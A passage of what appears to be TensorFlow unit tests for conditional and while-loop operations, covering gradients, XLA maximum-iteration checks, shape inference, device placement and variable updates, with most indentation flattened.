if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/112477618 (Operation returned from cond)")
    # Make sure the recv identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
with ops.device(test.gpu_device_name()):
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
with ops.device("/cpu:0"):
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
sess.run(r)
def testCondGrad_1(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113346829 (gpu failure)")
graph = ops.Graph()
with graph.as_default():
x = constant_op.constant(10.0, name="x")
pred = math_ops.less(1, 2)
fn1 = lambda: array_ops.identity(x)
fn2 = lambda: array_ops.identity(x)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
with self.cached_session():
self.assertAllEqual(1.0, grad.eval())
def testCondGrad_2(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
x = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
fn1 = lambda: math_ops.multiply(x, 42.0)
fn2 = lambda: math_ops.multiply(x, 3.0)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
self.assertAllEqual(42.0, grad.eval(feed_dict={c: 1}))
self.assertAllEqual(3.0, grad.eval(feed_dict={c: 3}))
def testCondGrad_3(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/110550782 (gradient w.r.t external variable)")
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
ox = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
def fn1(x):
m = x * x
return gradients_impl.gradients(m, [ox])[0]
fn2 = lambda: math_ops.multiply(ox, 3.0)
y = math_ops.multiply(7.0, ox)
r = control_flow_ops.cond(pred, lambda: fn1(y), fn2)
self.assertAllEqual(980.0, r.eval(feed_dict={c: 1}))
self.assertAllEqual(30.0, r.eval(feed_dict={c: 3}))
def testNestedCond_Simple(self):
with self.cached_session():
x = constant_op.constant(0., name="X")
y = control_flow_ops.cond(
constant_op.constant(True), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(y, x)[0]
self.assertEqual(1.0, result.eval())
z = control_flow_ops.cond(
constant_op.constant(False), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(z, x)[0]
self.assertEqual(1.0, result.eval())
def testCondGrad_Gather(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113327884")
with self.cached_session() as sess:
v1 = variables.Variable([1.0, 42.0])
c = array_ops.placeholder(dtypes.int32, shape=[])
pred = math_ops.less(c, 2)
fn1 = lambda: array_ops.identity(v1)
fn2 = lambda: array_ops.gather(v1, [1, 1])
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [v1])[0]
variables.global_variables_initializer().run()
# Should just be [1, 1], but possibly a sparse representation
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 1})
dense_gv = [
sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [1.0, 1.0])
# Should be [0, 2], as the else forwards v1[1] twice
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 3})
dense_gv = [
sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [0.0, 2.0])
# Microbenchmark: 256,000 iterations/s.
def testWhile_1(self):
with self.cached_session():
n = constant_op.constant(0)
c = lambda x: math_ops.less(x, 10000)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, r.eval())
def testWhileExternalControlDependencies(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(i):
with ops.control_dependencies([increment]):
return i + 1
result = control_flow_ops.while_loop(cond=lambda i: i < 2,
body=body_fn, loop_vars=[1])
self.assertAllEqual(result.eval(), 2)
self.assertAllEqual(v.eval(), 1.0)
def testWhileExternalControlDependenciesNoInput(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(unused_i):
with ops.control_dependencies([increment]):
return constant_op.constant(5, name="five")
result = control_flow_ops.while_loop(cond=lambda i: i < 5,
body=body_fn, loop_vars=[0])
result.eval()
self.assertAllEqual(v.eval(), 1.0)
def testWhileWithRefs_1(self):
with self.cached_session() as sess:
x = variables.Variable(0)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 100)
self.assertEqual(x.dtype, dtypes.int32_ref)
def b(i, x):
self.assertEqual(x.dtype, dtypes.int32_ref)
return (i + 1, gen_array_ops.ref_identity(x))
r = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=5)
variables.global_variables_initializer().run()
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.int32_ref)
value_i, value_x = sess.run(r)
self.assertEqual(100, value_i)
self.assertEqual(0, value_x)
def testWhile_2(self):
with self.cached_session():
s = constant_op.constant(0)
r = isum(s)
self.assertAllEqual(45, r.eval())
def testWhileWithMaximumIterations(self):
with self.cached_session():
s = constant_op.constant([1, 2, 3, 4, 5])
r = isum(s, maximum_iterations=3)
self.assertAllEqual([1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3], r.eval())
def testWhileWithMaximumIterationsAndSingleArgument(self):
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [0], maximum_iterations=1)
self.assertEqual(1, r.eval())
def testSingleNestedMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def training_loop_with_gradient(i):
out = control_flow_ops.while_loop(
lambda i_, _: i_ < 3,
lambda i_, j: [i_ + 1, j * v], [0, 1.0],
maximum_iterations=i)
g = gradients_impl.gradients(out, v)
with ops.control_dependencies(g):
return i + 1
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
# Create training loop, ensure we can call gradient() of
# while_loop inside the training loop.
loop = control_flow_ops.while_loop(lambda i: i < 3,
training_loop_with_gradient, [0])
xla_context.Exit()
loop_execute = array_ops.identity(loop) # Because loop is not fetchable.
# Should execute without issue.
self.assertEqual(3, self.evaluate(loop_execute))
def testInvalidMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def inner_body(i, x):
out = control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, j: [i + 1, j * v], [0, x],
maximum_iterations=i)
return out
def create_while_loop(maximum_iterations=None):
return control_flow_ops.while_loop(
lambda i, _: i < 3,
inner_body, [0, 1.0],
maximum_iterations=maximum_iterations)
loop_no_xla = create_while_loop(maximum_iterations=5)
# maximum_iterations is fine outside of an XLA scope
gs = gradients_impl.gradients(loop_no_xla, v)
self.evaluate(gs) # This should execute without error.
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop_no_maxiter = create_while_loop()
loop_with_maxiter = create_while_loop(maximum_iterations=2)
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside "
r"XLA while_loop because maximum_iterations was not passed to "
r"the tf.while_loop call \('.+'\)."):
_ = gradients_impl.gradients(loop_no_maxiter, v)
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.+' for while_loop context "
r"'.+' must be statically known \(e.g. a constant value or known "
r"shape dimension\), or be defined at or outside the while loop "
r"context '.*' \(currently defined in '.*'\)"):
_ = gradients_impl.gradients(loop_with_maxiter, v)
def testInvalidMaximumIterationsFromSiblingContextWhileLoopInXLAContext(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294340 (enable while_v2)")
v = constant_op.constant(1.0)
def create_while_loop():
max_iter_holder = []
def create_mi():
max_iter_holder.append(array_ops.placeholder(dtypes.int32, shape=()))
return 1.0
_ = control_flow_ops.cond(
constant_op.constant(True), create_mi, create_mi)
return control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, x: (i + 1, v * x), (0, 1.0),
maximum_iterations=max_iter_holder[0])
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop = create_while_loop()
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.*Placeholder:0' for "
r"while_loop context '.+' must be statically known \(e.g. a constant "
r"value or known shape dimension\), or be defined at or outside the "
r"while loop context '' \(currently defined in 'cond/.+'\)"):
_ = gradients_impl.gradients(loop, v)
def testNestedWhileLoopWithMaxItersFromOuterContextInXLAContext(self):
v = constant_op.constant(1.0)
p = array_ops.placeholder(dtype=dtypes.int32)
def mid_body_builder(iterations):
def mid_body(i, x):
r = control_flow_ops.while_loop(
lambda *_: True,
lambda i, x: (i + 1, v * x), (0, x),
maximum_iterations=iterations,
name="inner")
return (i + 1, gradients_impl.gradients(x + r[1], v)[0])
return mid_body
def outer_body(i, x):
iterations = array_ops.size(p, name="iterations")
return (i + 1, x + control_flow_ops.while_loop(
lambda *_: True,
mid_body_builder(iterations), (0, x),
maximum_iterations=iterations,
name="mid")[1])
def create_while_loop():
with ops.device("/cpu:0"):
r = control_flow_ops.while_loop(
lambda *_: True,
outer_body, (0, 1.0),
maximum_iterations=5,
name="outer")
return array_ops.identity(r[1])
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
final_with_xla_context = create_while_loop()
xla_context.Exit()
final_without_xla_context = create_while_loop()
with self.test_session(use_gpu=False) as sess:
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
final_value_without_xla_context = sess.run(
final_without_xla_context, feed_dict={
p: [0, 0, 0]
})
final_value_with_xla_context = sess.run(
final_with_xla_context,
feed_dict={p: [0, 0, 0]},
options=opts,
run_metadata=run_metadata)
node_stats = run_metadata.step_stats.dev_stats[0].node_stats
stack_push_count = len(
[x for x in node_stats if x.node_name.endswith("StackPushV2")])
      # Pushes to the stack = product of maximum_iterations values;
      # the last two "3"s come from size(p), when p == [0, 0, 0].
self.assertEqual(stack_push_count, 5 * 3 * 3)
self.assertAllClose(final_value_with_xla_context,
final_value_without_xla_context)
  # Have more than 10 parallel iterations and hence exercise the k-bound
  # most of the time.
def testWhile_3(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [math_ops.add(m, 1), math_ops.add(c, 1)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
d = ops.convert_to_tensor(100)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, d),
compute, [i, m, c, o])
result = r[3].eval()
self.assertAllEqual(10100, result)
def testWhile_4(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [array_ops.gather(x, i), array_ops.gather(x, i)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, s),
compute, [i, m, c, o])
result = r[3].eval()
self.assertAllEqual(42, result)
def testWhile_5(self):
with self.cached_session():
def compute(i, c, o):
c = array_ops.strided_slice(x, array_ops.expand_dims(i, 0),
[1] + array_ops.expand_dims(i, 0))
o = array_ops.concat([o, c], 0)
i = math_ops.add(i, 1)
return [i, c, o]
i = ops.convert_to_tensor(0)
c = ops.convert_to_tensor([0])
o = ops.convert_to_tensor([0])
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, c, o: math_ops.less(i, s),
compute, [i, c, o], [
i.get_shape(),
tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()
])
result = r[2].eval()
self.assertAllEqual(np.array([0, 1, 2, 3, 4, 5, 6]), result)
def testBufferForwarding(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with self.cached_session() as sess:
with ops.device("/cpu:0"):
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
r_val = sess.run(r, options=run_options, run_metadata=run_metadata)
self.assertEqual(1000, r_val)
self.assertTrue(run_metadata.HasField("step_stats"))
unique_allocs = set()
for node_stat in run_metadata.step_stats.dev_stats[0].node_stats:
for output in node_stat.output:
unique_allocs.add(
output.tensor_description.allocation_description.ptr)
# Prior to cl/147536680, the number of unique allocations was about 1005.
self.assertLess(len(unique_allocs), 756)
def _testWhile_Gpu_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
b = lambda x: math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_1(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
def _testWhile_Gpu_2(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
return math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_2(self):
    self._testWhile_Gpu_2(use_gpu=False)
    self._testWhile_Gpu_2(use_gpu=True)
def testWhileShape(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def _b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.tile(j, [2, 2])
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, _b, [i, m],
[i.get_shape(), tensor_shape.unknown_shape()])
r = r[1] * array_ops.ones([8, 8])
self.assertAllEqual(np.ones((8, 8)), r.eval())
def testWhileWithNonTensorInput_Scalar(self):
with self.cached_session():
n = 0
c = lambda x: x < 10000
b = lambda x: x + 1
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, r.eval())
def testWhileWithNonTensorInput_Vector(self):
with self.cached_session():
n = np.array([0]) # Note, [0] would not work here; that is a list
c = lambda x: x[0] < 10000
b = lambda x: array_ops.stack([x[0] + 1])
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual([10000], r.eval())
def testWhileShapeInference(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.concat([j, j], 0)
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, b, [i, m],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertTrue(r[1].get_shape()[0].value is None)
self.assertEqual(r[1].get_shape()[1], tensor_shape.Dimension(2))
with self.assertRaisesRegexp(
ValueError,
r"Input tensor 'ones:0' enters the loop with shape \(2, 2\), but has "
r"shape \(4, 2\) after one iteration. To allow the shape to vary "
r"across iterations, use the `shape_invariants` argument of "
r"tf.while_loop to specify a less-specific shape."):
r = control_flow_ops.while_loop(c, b, [i, m])
def testWhileShapeInferenceSparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0].value, 1)
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None])])
self.assertTrue(r.dense_shape.get_shape()[0].value is None)
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([5])])
def testWhileShapeInferenceIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([[2.0, 4.0], [3.0, 5.0]], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10, 2], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0].value, 2)
self.assertEqual(r.values.get_shape(), tensor_shape.TensorShape([2, 2]))
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertEqual(r.dense_shape.get_shape()[0].value, 2)
self.assertTrue(r.values.get_shape()[0].value is None)
self.assertEqual(r.values.get_shape()[1].value, 2)
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 5])])
def _testNestedWhile_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(0)
def cpu_sum(s):
c = lambda i, s: math_ops.less(i, 10)
def b(i, s):
i1 = math_ops.add(i, 1)
with ops.device("/cpu:0"):
s1 = math_ops.add(i, s)
return i1, s1
_, r_s = control_flow_ops.while_loop(c, b, [n, s])
return r_s
c = lambda x: math_ops.less(x, 200)
b = lambda x: math_ops.add(x, cpu_sum(n))
r = control_flow_ops.while_loop(c, b, [n])
self.assertEqual(225, r.eval())
def testNestedWhile_1(self):
self._testNestedWhile_1(use_gpu=False)
self._testNestedWhile_1(use_gpu=True)
def _testNestedWhile_2(self, use_gpu):
    # Test the cases where A -> Enter and Exit -> A edges are partitioned.
with self.test_session(use_gpu=use_gpu):
s0 = constant_op.constant(2.0)
def inner_loop(s):
c = lambda s: math_ops.less(s, 20.0)
def b(s):
s1 = math_ops.add(s, s)
return s1
r_s = control_flow_ops.while_loop(c, b, [s], parallel_iterations=1)
return r_s
outer_c = lambda x: math_ops.less(x, 3000.0)
def outer_b(x):
x = logging_ops.Print(x, [x]) # Edge "Print -> Enter" is partitioned
x = inner_loop(x)
with ops.device("/cpu:0"):
x = math_ops.square(x) # Edge "Exit -> Square" is partitioned
return x
r = control_flow_ops.while_loop(
outer_c, outer_b, [s0], parallel_iterations=1)
self.assertEqual(1048576.0, r.eval())
def testNestedWhile_2(self):
self._testNestedWhile_2(use_gpu=False)
self._testNestedWhile_2(use_gpu=True)
def testWhileWithControl_1(self):
with self.cached_session():
n = constant_op.constant(0)
r = constant_op.constant(0)
condition = lambda n_, r_: math_ops.less(n_, 10)
def body(n_, r_):
n_ = math_ops.add(n_, 1)
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [n_, r_]
res = control_flow_ops.while_loop(
condition, body, [n, r], parallel_iterations=1)
self.assertAllEqual(12, res[1].eval())
def testWhileWithControl_2(self):
with self.cached_session():
r = constant_op.constant(0)
condition = lambda r_: math_ops.less(r_, 10)
def body(r_):
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [r_]
res = control_flow_ops.while_loop(
condition, body, [r], parallel_iterations=1)
self.assertAllEqual(12, res.eval())
def testWhileWithControl_3(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(lambda x: x < 10, lambda x: x + c, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileWithControl_4(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(
lambda x: x < 10, lambda x: x + array_ops.identity(c), [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileWithControl_5(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
def body(x):
with ops.control_dependencies([b]):
return x + c
r = control_flow_ops.while_loop(lambda x: x < 10, body, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileCondWithControl(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
# Ensure that no control edges by an outer control dependency context are
# added to nodes inside cond/while contexts.
with self.cached_session() as sess:
const_true = lambda: constant_op.constant(True)
const_false = lambda: constant_op.constant(False)
cond = lambda i: control_flow_ops.cond(i > 0, const_true, const_false)
body = lambda i: control_flow_ops.cond(i > 0, lambda: i - 1, lambda: i)
with ops.control_dependencies([control_flow_ops.no_op()]):
loop = control_flow_ops.while_loop(cond, body,
(constant_op.constant(5),))
self.assertEqual(0, sess.run(loop))
def testWhileCondWithControl_1(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113324949 (ref vars)")
with self.cached_session():
v = variable_scope.get_variable(
"v", [], initializer=init_ops.constant_initializer(2))
i0 = constant_op.constant(0)
with ops.control_dependencies([i0]):
def loop_condition(i):
return i < 4
def loop_body(i):
some_cond = control_flow_ops.cond(
constant_op.constant(True),
lambda: state_ops.assign(v, math_ops.square(v)), lambda: v)
with ops.control_dependencies([some_cond]):
return i + 1
r = control_flow_ops.while_loop(loop_condition, loop_body, (i0,))
variables.global_variables_initializer().run()
self.assertEqual(4, r.eval())
self.assertAllClose(65536.0, v.eval())
def testWhileCondExitControl(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294340 (enable while_v2)")
with self.cached_session():
v = variables.Variable(1)
def false_branch():
cond = lambda i: i < 100
def body(i):
x = state_ops.assign(v, i)
return x + 1
loop = control_flow_ops.while_loop(cond, body, [0])
        # Make sure a control edge from Exit to a node is handled correctly.
with ops.control_dependencies([loop]):
return constant_op.constant(6.0)
r = control_flow_ops.cond(
constant_op.constant(False), lambda: constant_op.constant(1.0),
false_branch)
variables.global_variables_initializer().run()
self.assertEqual(6.0, r.eval())
self.assertEqual(99, v.eval())
def testCondWhile_1(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(0, 1), lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: n)
self.assertAllEqual(10, r.eval())
def testCondWhile_2(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(n, 1),
lambda: control_flow_ops.while_loop(c, b, [n]))
self.assertAllEqual(10, r.eval())
def _testCondWhile_3(self, use_gpu):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294340 (enable while_v2)")
with self.test_session(use_gpu=use_gpu) as sess:
p = array_ops.placeholder(dtypes.bool)
n = constant_op.constant(0.0)
def c(x):
return math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
x1 = math_ops.add(x, 1.0)
return x1
r = control_flow_ops.cond(p,
lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: math_ops.multiply(n, 2.0))
r1 = gradients_impl.gradients(r, [n])
self.assertEqual(10, sess.run(r, {p: True}))
self.assertEqual([1.0], sess.run(r1, {p: True}))
self.assertEqual(0.0, sess.run(r, {p: False}))
self.assertEqual([2.0], sess.run(r1, {p: False}))
def testCondWhile_3(self):
self._testCondWhile_3(use_gpu=False)
self._testCondWhile_3(use_gpu=True)
def testWhileCond_1(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
with self.cached_session():
i = ops.convert_to_tensor(0, name="i")
n = ops.convert_to_tensor(10, name="n")
one = ops.convert_to_tensor(1, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.add(x, one), lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [i])
self.assertAllEqual(10, r.eval())
def testWhileCond_2(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
      b = lambda x: control_flow_ops.cond(
          constant_op.constant(True), lambda: math_ops.add(x, 1), lambda: n)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
def testWhileCond_3(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(math_ops.less(0, 1),
lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
# NOTE: It is ok to have parallel_iterations > 1
def testWhileUpdateVariable_1(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
variables.global_variables_initializer().run()
self.assertEqual(3, r.eval())
result = select.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
def testWhileUpdateVariable_2(self):
with self.cached_session():
select1 = variables.Variable([3.0, 4.0, 5.0])
select2 = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns1 = state_ops.scatter_update(select1, j, 10.0)
ns2 = state_ops.scatter_update(select2, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns1, ns2)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
variables.global_variables_initializer().run()
self.assertEqual(3, r.eval())
result1 = select1.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result1)
result2 = select2.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result2)
def testWhileUpdateVariable_3(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j, _):
return math_ops.less(j, 3)
def loop_body(j, _):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
return [nj, ns]
r = control_flow_ops.while_loop(
loop_iterator,
loop_body, [n, array_ops.identity(select)],
parallel_iterations=1)
variables.global_variables_initializer().run()
result = r[1].eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
# b/24814703
def testWhileUpdateVariable_4(self):
with self.cached_session():
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
variables.global_variables_initializer().run()
c = constant_op.constant(0, name="c")
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn2 = state_ops.assign_add(var_b, asn1, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1)
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
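      # asn1 is lifted outside the loop and runs once (var_a = 1); its
      # captured value is added to var_b on each of the 10 iterations.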
self.assertEqual(10, var_b.eval())
# b/24736492
def testWhileUpdateVariable_5(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
variables.global_variables_initializer().run()
# Change condition to check var_b
def pred(_):
return math_ops.less(var_b, 10)
# Change body to increment var_b
def loop_body(i):
asn1 = state_ops.assign_add(
var_a, constant_op.constant(1), name="a_add")
asn2 = state_ops.assign_add(
var_b, constant_op.constant(1), name="b_add")
with ops.control_dependencies([asn1, asn2]):
inc_b = array_ops.identity(var_b)
return inc_b
lpa = control_flow_ops.while_loop(
pred, loop_body, [var_b], parallel_iterations=1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_a.eval())
self.assertEqual(10, var_b.eval())
# b/24814668
def testWhileUpdateVariable_6(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
c = constant_op.constant(0)
variables.global_variables_initializer().run()
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
